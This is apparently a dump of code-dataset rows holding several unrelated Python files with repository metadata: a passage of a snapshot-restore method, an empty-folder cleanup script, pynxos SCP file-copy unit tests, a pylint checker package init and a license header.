"ERROR: Required argument (nodes) doesn't exist")
nodes = kwargs['nodes']
if len(nodes) != len(self.nodes):
err = "set_service_snapshot: len(nodes) != len(self.nodes)"
self.logger.error(err)
return HttpErrorResponse(err)
self.logger.info("set_service_snapshot: stopping all agent services")
# rewriting state
self.osdNodes = []
self.mrcNodes = []
self.dirNodes = []
self.dir_node_uuid_map = {}
self.mrc_node_uuid_map = {}
self.osd_node_uuid_map = {}
self.osd_uuid_volume_map = {}
for node, data in zip(self.nodes, nodes):
volumeid = data.get('volume')
osd_uuid = data.get('osd_uuid')
mrc_uuid = data.get('mrc_uuid')
dir_uuid = data.get('dir_uuid')
# If this is a dir node
if dir_uuid:
self.dir_node_uuid_map[node.id] = dir_uuid
self.dirNodes.append(node)
# If this is a mrc node
if mrc_uuid:
self.mrc_node_uuid_map[node.id] = mrc_uuid
self.mrcNodes.append(node)
# If this is an OSD node
if osd_uuid:
self.osd_node_uuid_map[node.id] = osd_uuid
self.osdNodes.append(node)
if volumeid:
self.osd_uuid_volume_map[osd_uuid] = volumeid
try:
self.get_volume(volumeid)
except Exception:
# This volume is not in the list of known ones.
volumeCloud = self._init_cloud(data.get('cloud'))
class volume:
id = volumeid
cloud = volumeCloud
self.volumes.append(volume)
# Regardless of node type, restore metadata
try:
self.logger.info('set_service_snapshot: restoring %s' %
node.ip)
data = client.set_snapshot(node.ip, 5555, data['archive'])
except client.AgentException as err:
self.logger.exception(err)
raise err
self.logger.info("set_service_snapshot: starting all agent services")
self._start_all()
self.logger.info("set_service_snapshot: all agent services started")
return HttpJsonResponse()
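# For illustration only: a single element of the list returned by
# get_service_snapshot above could look roughly like this (every value below
# is made up; 'data' is the base64-encoded agent archive and 'cloud' is only
# present when a volume is attached to the OSD):
#
# {
#     'data': 'SGVsbG8uLi4=',
#     'dir_uuid': 'a1b2c3d4-dir',
#     'mrc_uuid': None,
#     'osd_uuid': 'e5f6a7b8-osd',
#     'volume': 'vol-0123456789',
#     'cloud': 'iaas'
# }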
| 0
| 20,025
| 0
| 17,521
| 0
| 109
| 0
| 134
| 250
|
a3c424cf728d4c2ef3a50ff9cfcd26a82c1360fa
| 505
|
py
|
Python
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 50
|
2020-09-19T16:40:21.000Z
|
2022-02-05T05:48:42.000Z
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 266
|
2020-09-25T17:24:04.000Z
|
2021-11-29T07:17:57.000Z
|
Python/delete_empty_folders/script.py
|
Ian-Yy/code-n-stitch
|
20fc8784bf51bd3e36329d1ca44b0be6dc66fae6
|
[
"MIT"
] | 113
|
2020-09-26T10:28:11.000Z
|
2021-10-15T06:58:53.000Z
|
import os
import sys
# enter path to the directory with the files
x = input('Absolute path of folder, from which empty subfolders are to be removed: ')
# check if path is valid
if not os.path.exists(x):
print('Invalid path\nTerminating program')
sys.exit()
# cleanup of empty subfolders
walk = list(os.walk(x))
for path, folders, files in walk:
if (len(folders) == 0) and (len(files) == 0):
os.rmdir(path)
print(f'Removed empty directory: {path}')
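# A second, bottom-up pass (a sketch, not part of the original script): walking
# with topdown=False also removes directories that only become empty after
# their empty children have been deleted above.
for path, folders, files in os.walk(x, topdown=False):
    if not os.listdir(path):
        os.rmdir(path)
        print(f'Removed empty directory: {path}')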
| 26.578947
| 85
| 0.720792
|
import os
import sys
# enter path to the directory with the files
x = input('Absolute path of folder, from which empty subfolders are to be removed: ')
# check if path is valid
if not os.path.exists(x):
print('Invalid path\nTerminating program')
sys.exit()
# cleanup of empty subfolders
walk = list(os.walk(x))
for path, folders, files in walk:
if (len(folders) == 0) and (len(files) == 0):
os.rmdir(path)
print(f'Removed empty directory: {path}')
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0a5858e6445232a1bc20db7f822c0cac94845b29
| 21,764
|
py
|
Python
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 14
|
2016-04-17T19:03:15.000Z
|
2021-04-06T13:04:23.000Z
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 8
|
2016-02-02T23:44:12.000Z
|
2019-02-15T20:20:20.000Z
|
test/unit/test_file_copy.py
|
networktocode/pynxos
|
6ee22d52e5a0f0ae2e6b96b0c1ce158c30eb75e9
|
[
"Apache-2.0"
] | 17
|
2016-04-17T19:03:17.000Z
|
2021-04-05T09:55:43.000Z
|
import unittest
if __name__ == "__main__":
unittest.main()
| 91.445378
| 3,856
| 0.66826
|
import unittest
import mock
from tempfile import NamedTemporaryFile
from pynxos.features.file_copy import FileCopy, FileTransferError
class FileCopyTestCase(unittest.TestCase):
@mock.patch('pynxos.device.Device', autospec=True)
def setUp(self, mock_device):
self.device = mock_device
self.device.host = 'host'
self.device.username = 'user'
self.device.password = 'pass'
self.fc = FileCopy(self.device, '/path/to/source_file')
def test_init(self):
self.assertEqual(self.fc.device, self.device)
self.assertEqual(self.fc.src, '/path/to/source_file')
self.assertEqual(self.fc.dst, 'source_file')
self.assertEqual(self.fc.port, 22)
self.assertEqual(self.fc.file_system, 'bootflash:')
def test_get_remote_size(self):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
result = self.fc.get_remote_size()
expected = 19439792128
self.assertEqual(result, expected)
self.device.show.assert_called_with('dir bootflash:', raw_text=True)
@mock.patch('os.path.getsize')
def test_enough_space(self, mock_getsize):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
mock_getsize.return_value = 10
result = self.fc.enough_remote_space()
self.assertEqual(result, True)
mock_getsize.assert_called_with('/path/to/source_file')
@mock.patch('os.path.getsize')
def test_not_enough_space(self, mock_getsize):
self.device.show.return_value = ' 4096 Mar 15 17:06:51 2016 .rpmstore/\n 3651 May 19 18:26:19 2014 20140519_182619_poap_6121_init.log\n 3651 May 19 18:34:38 2014 20140519_183438_poap_5884_init.log\n 23167 Jul 11 19:55:32 2014 20140711_195320_poap_5884_init.log\n 3735 Oct 09 18:00:43 2015 20151009_180036_poap_6291_init.log\n 2826 Oct 12 20:17:32 2015 abc\n 7160 Oct 06 13:49:57 2015 cfg_flowtracker1\n 7123 Oct 08 19:26:48 2015 cfg_flowtracker1_2\n 89620 Oct 09 18:04:41 2015 clean_n9k2_all_cfg\n 2773 Oct 09 18:04:18 2015 clean_n9k2_cfg\n 17339 Oct 09 19:58:44 2015 clean_n9k2_cp\n 18203 Oct 12 19:41:21 2015 clean_n9k2_cp2\n 18118 Oct 12 21:03:57 2015 config_2015-10-12_17:03:46.308598\n 18118 Oct 12 21:03:58 2015 config_2015-10-12_17:03:47.338797\n 18118 Oct 12 21:04:03 2015 config_2015-10-12_17:03:52.012664\n 18118 Oct 12 21:06:17 2015 config_2015-10-12_17:06:05.026284\n 18118 Oct 12 21:07:03 2015 config_2015-10-12_17:06:50.357353\n 18118 Oct 12 21:08:13 2015 config_2015-10-12_17:08:01.145064\n 18118 Oct 12 21:12:55 2015 config_2015-10-12_17:12:43.603017\n 18118 Oct 12 21:13:38 2015 config_2015-10-12_17:13:25.476126\n 18098 Oct 12 21:14:40 2015 config_2015-10-12_17:14:29.411540\n 18118 Oct 12 21:14:43 2015 config_2015-10-12_17:14:32.442546\n 18099 Oct 12 21:14:46 2015 config_2015-10-12_17:14:35.595983\n 18118 Oct 12 21:16:03 2015 config_2015-10-12_17:15:51.501546\n 18118 Oct 12 21:16:20 2015 config_2015-10-12_17:16:09.478200\n 18118 Oct 12 21:16:21 2015 config_2015-10-12_17:16:10.613538\n 18099 Oct 12 21:16:25 2015 config_2015-10-12_17:16:13.730374\n 18118 Oct 12 21:16:30 2015 config_2015-10-12_17:16:18.856276\n 18118 Oct 12 21:16:36 2015 config_2015-10-12_17:16:24.817255\n 4096 Jan 11 20:00:40 2016 configs/\n 5365 Feb 05 15:57:55 2015 configs:jaay.cfg\n 5365 Feb 05 15:51:31 2015 configs:jay.cfg\n 18061 Oct 09 19:12:42 2015 cp_with_shutdown\n 154 Feb 19 21:33:05 2015 eth3.cfg\n 65 Feb 19 21:18:28 2015 eth_1_1.cfg\n 4096 Aug 10 18:54:09 2015 home/\n 18111 Oct 12 20:30:41 2015 initial.conf\n 4096 Mar 15 15:42:22 2016 lost+found/\n 309991424 May 19 18:23:41 2014 n9000-dk9.6.1.2.I2.1.bin\n 353457152 Nov 02 15:14:40 2014 n9000-dk9.6.1.2.I3.1.bin\n 37612335 Nov 02 15:20:00 2014 n9000-epld.6.1.2.I3.1.img\n 9888 Oct 08 18:35:39 2015 n9k1_cfg\n 73970 Oct 09 16:30:54 2015 n9k2_all_cfg\n 7105 Oct 08 19:48:41 2015 n9k2_cfg\n 7142 Oct 08 18:49:19 2015 n9k2_cfg_safe\n 21293 Oct 09 17:16:57 2015 n9k2_cp\n 4096 Aug 10 20:17:35 2015 netmiko/\n 18187 Oct 12 20:31:20 2015 new_typo.conf\n 17927 Oct 12 18:25:40 2015 newcpfile\n 535352320 Mar 15 15:39:31 2016 nxos.7.0.3.I2.1.bin\n 4096 Jan 28 15:33:36 2015 onep/\n 6079 Oct 06 14:46:33 2015 pn9k1_cfg.bak\n 54466560 Jan 28 12:48:30 2015 puppet-1.0.0-nx-os-SPA-k9.ova\n 9698 Sep 19 05:43:12 2014 sart\n 4096 Feb 05 15:15:30 2015 scriaspts/\n 4096 Feb 05 15:09:35 2015 scripts/\n 3345 Feb 19 21:04:50 2015 standardconfig.cfg\n 21994 Oct 23 15:32:18 2015 travis_ping\n 18038 Oct 12 19:32:17 2015 tshootcp\n 4096 Mar 15 15:48:59 2016 virt_strg_pool_bf_vdc_1/\n 4096 Jan 28 15:30:29 2015 virtual-instance/\n 125 Mar 15 15:48:12 2016 virtual-instance.conf\n 2068 Mar 16 09:58:23 2016 vlan.dat\nUsage for bootflash://sup-local\n 2425626624 bytes used\n19439792128 bytes free\n21865418752 bytes total\n'
mock_getsize.return_value = 100000000000000000
result = self.fc.enough_remote_space()
self.assertEqual(result, False)
mock_getsize.assert_called_with('/path/to/source_file')
@mock.patch('os.path.isfile')
def test_local_file_exists(self, mock_isfile):
mock_isfile.return_value = True
result = self.fc.local_file_exists()
expected = True
self.assertEqual(result, expected)
mock_isfile.assert_called_with('/path/to/source_file')
@mock.patch('os.path.isfile')
def test_local_file_doesnt_exist(self, mock_isfile):
mock_isfile.return_value = False
result = self.fc.local_file_exists()
expected = False
self.assertEqual(result, expected)
mock_isfile.assert_called_with('/path/to/source_file')
@mock.patch.object(FileCopy, 'get_local_md5')
def test_file_already_exists(self, mock_local_md5):
mock_local_md5.return_value = 'b211e79fbaede5859ed2192b0fc5f1d5'
self.device.show.return_value = {'file_content_md5sum': 'b211e79fbaede5859ed2192b0fc5f1d5\n'}
result = self.fc.already_transfered()
self.assertEqual(result, True)
self.device.show.assert_called_with('show file bootflash:source_file md5sum', raw_text=False)
mock_local_md5.assert_called_with()
@mock.patch.object(FileCopy, 'get_local_md5')
def test_file_doesnt_already_exists(self, mock_local_md5):
mock_local_md5.return_value = 'abcdef12345'
self.device.show.return_value = {'file_content_md5sum': 'b211e79fbaede5859ed2192b0fc5f1d5\n'}
result = self.fc.already_transfered()
self.assertEqual(result, False)
self.device.show.assert_called_with('show file bootflash:source_file md5sum', raw_text=False)
mock_local_md5.assert_called_with()
def test_remote_file_doesnt_exists(self):
self.device.show.return_value = 'No such file'
result = self.fc.remote_file_exists()
self.assertEqual(result, False)
self.device.show.assert_called_with('dir bootflash:/source_file', raw_text=True)
def test_remote_file_exists(self):
self.device.show.return_value = ' 5 Mar 23 00:48:15 2016 smallfile\nUsage for bootflash://sup-local\n 2425630720 bytes used\n19439788032 bytes free\n21865418752 bytes total\n'
result = self.fc.remote_file_exists()
self.assertEqual(result, True)
self.device.show.assert_called_with('dir bootflash:/source_file', raw_text=True)
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
self.fc.send()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.put.assert_called_with('/path/to/source_file', 'bootflash:source_file')
mock_SCP.return_value.close.assert_called_with()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_get_file(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
self.fc.get()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.get.assert_called_with('bootflash:source_file', '/path/to/source_file')
mock_SCP.return_value.close.assert_called_with()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_error_local_not_exist(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = False
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
with self.assertRaises(FileTransferError):
self.fc.send()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_error_not_enough_space(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = False
mock_ssh = mock_paramiko.SSHClient.return_value
with self.assertRaises(FileTransferError):
self.fc.send()
@mock.patch('pynxos.features.file_copy.paramiko')
@mock.patch('pynxos.features.file_copy.SCPClient')
@mock.patch.object(FileCopy, 'get_local_md5')
@mock.patch.object(FileCopy, 'get_remote_md5')
@mock.patch.object(FileCopy, 'local_file_exists')
@mock.patch.object(FileCopy, 'enough_space')
def test_send_file_transfer_error(self, mock_enough_space, mock_local_file_exists, mock_remote_md5, mock_local_md5, mock_SCP, mock_paramiko):
mock_remote_md5.return_value = 'abc'
mock_local_md5.return_value = 'abc'
mock_local_file_exists.return_value = True
mock_enough_space.return_value = True
mock_ssh = mock_paramiko.SSHClient.return_value
mock_SCP.return_value.put.side_effect = Exception
with self.assertRaises(FileTransferError):
self.fc.send()
mock_paramiko.SSHClient.assert_called_with()
mock_ssh.set_missing_host_key_policy.assert_called_with(mock_paramiko.AutoAddPolicy.return_value)
mock_ssh.connect.assert_called_with(allow_agent=False,
hostname=self.device.host,
look_for_keys=False,
password=self.device.password,
port=22,
username=self.device.username)
mock_SCP.assert_called_with(mock_ssh.get_transport.return_value)
mock_SCP.return_value.put.assert_called_with('/path/to/source_file', 'bootflash:source_file')
mock_SCP.return_value.close.assert_called_with()
if __name__ == "__main__":
unittest.main()
| 0
| 16,132
| 0
| 5,426
| 0
| 0
| 0
| 52
| 90
|
1ba7e9d00ac9ddde32d332f71e982fac582852a8
| 1,154
|
py
|
Python
|
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | 1
|
2017-12-08T15:55:17.000Z
|
2017-12-08T15:55:17.000Z
|
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | null | null | null |
lcd-numbers/pylint/checkers/__init__.py
|
kelesi/coedcop
|
2bdbac207cf6f81de70b92c644c40663bbea8c8a
|
[
"MIT"
] | null | null | null |
"""Jeff Bay's Object Calisthenics Rules."""
# 1. One level of indentation per method
# * Pylint's "checkers.refactoring", max-nested-blocks=1
# * Pylint's "checkers.design_analysis", max-branches=1
# * DONE
# 2. Don't use the ELSE keyword
import checkers.no_else
# * also Pylint's "checkers.refactoring", max-nested-blocks=1
# * DONE
# 3. Wrap all primitives and Strings
# 4. First class collections
import checkers.first_class_collections
# * knows [], (), list(), set() and comprehensions.
# TODO add support for more types of collections
# * (kind of) DONE
# 5. One dot per line
import checkers.one_dot_per_line
# * DONE
# 6. Don't abbreviate
# TODO short names
# * good-names=reset
# 7. Keep all entities small
import checkers.small_entities
# * no class over 45 statements, no module over 10 classes, no module over 45 statements.
# * (kind of) DONE
# 8. No classes with more than two instance variables
import checkers.two_instance_variables
# * also Pylint's "checkers.design_analysis", max-attributes=2
# * DONE
# 9. No getters/setters/properties
# TODO do not use manual getters/setters
# * (kind of) DONE
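# For completeness, a checker package like this is usually wired into Pylint
# through a register() hook loaded via --load-plugins (minimal sketch; the
# NoElseChecker class name is hypothetical and would live in checkers/no_else.py):
#
# def register(linter):
#     from checkers.no_else import NoElseChecker
#     linter.register_checker(NoElseChecker(linter))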
| 26.837209
| 89
| 0.738302
|
"""Jeff Bay's Object Calisthenics Rules."""
# 1. One level of indentation per method
# * Pylint's "checkers.refactoring", max-nested-blocks=1
# * Pylint's "checkers.design_analysis", max-branches=1
# * DONE
# 2. Don't use the ELSE keyword
import checkers.no_else
# * also Pylint's "checkers.refactoring", max-nested-blocks=1
# * DONE
# 3. Wrap all primitives and Strings
# 4. First class collections
import checkers.first_class_collections
# * knows [], (), list(), set() and comprehensions.
# TODO add support for more types of collections
# * (kind of) DONE
# 5. One dot per line
import checkers.one_dot_per_line
# * DONE
# 6. Don't abbreviate
# TODO short names
# * good-names=reset
# 7. Keep all entities small
import checkers.small_entities
# * no class over 45 statements, no module over 10 classes, no module over 45 statements.
# * (kind of) DONE
# 8. No classes with more than two instance variables
import checkers.two_instance_variables
# * also Pylint's "checkers.design_analysis", max-attributes=2
# * DONE
# 9. No getters/setters/properties
import checkers.no_properties
# TODO do not use manual getters/setters
# * (kind of) DONE
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 22
|
0892a02aefb143a24befa8f3ebf7c11b8155f8f2
| 1,794
|
py
|
Python
|
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
args.py
|
stevievb/sagemaker-labeljob-scoreboard
|
038456cd2d83ba4bf365ecb305bf443cdc1aa404
|
[
"Apache-2.0"
] | null | null | null |
# 2020 Amgen Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# function to help parse query params from bokeh server url
DEFAULT_PLOT_HEIGHT = 500
DEFAULT_PLOT_WIDTH = 800
| 32.618182
| 105
| 0.672241
|
# © 2020 Amgen Inc. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# function to help parse query params from bokeh server url
